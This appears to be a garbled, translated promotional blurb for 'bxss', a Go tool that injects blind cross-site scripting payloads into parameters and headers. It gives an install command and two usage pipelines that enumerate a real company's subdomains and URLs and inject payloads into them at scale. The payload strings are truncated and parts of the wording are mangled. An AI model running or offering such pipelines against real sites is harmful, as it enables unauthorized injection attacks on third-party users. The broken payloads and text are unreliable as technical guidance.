Bxss is one script written in go, which allows us to discover Blind XSS Injector security holes.
Specifications
Insert Blind XSS payloads into custom headers
Enter Blind XSS payloads in parameters
Uses different request methods (PUT, POST, GET, OPTIONS) simultaneously
It has a large chain of tools
Really very fast
Easy to installation
Installation
$ go get -u github.com/ethicalhackingplayground/bxss
Use
Blind XSS In Parameters
$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload '”>'-parameters
Blind XSS In X-Forwarded-For Header
$ subfinder uber.com | gau | bxss -payload '”>'-header “X-Forwarded-For”
Snapshots applicationς
You can download the program from here.